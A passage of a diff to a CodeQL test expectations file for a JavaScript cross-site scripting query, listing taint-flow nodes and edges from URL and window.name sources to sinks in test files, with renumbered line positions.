.search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:20:13:20:45 | target | semmle.label | target | | typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | | typeahead.js:21:12:21:17 | target | semmle.label | target | @@ -811,8 +811,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | provenance | | | optionalSanitizer.js:2:7:2:39 | target | optionalSanitizer.js:6:18:6:23 | target | provenance | | | optionalSanitizer.js:2:7:2:39 | target | optionalSanitizer.js:8:17:8:22 | target | provenance | | 
@@ -919,8 +919,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | 
@@ -930,8 +930,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | 
@@ -949,217 +949,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... 
ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... 
search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... 
.search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... 
.search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... 
Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... 
hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... 
.search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... 
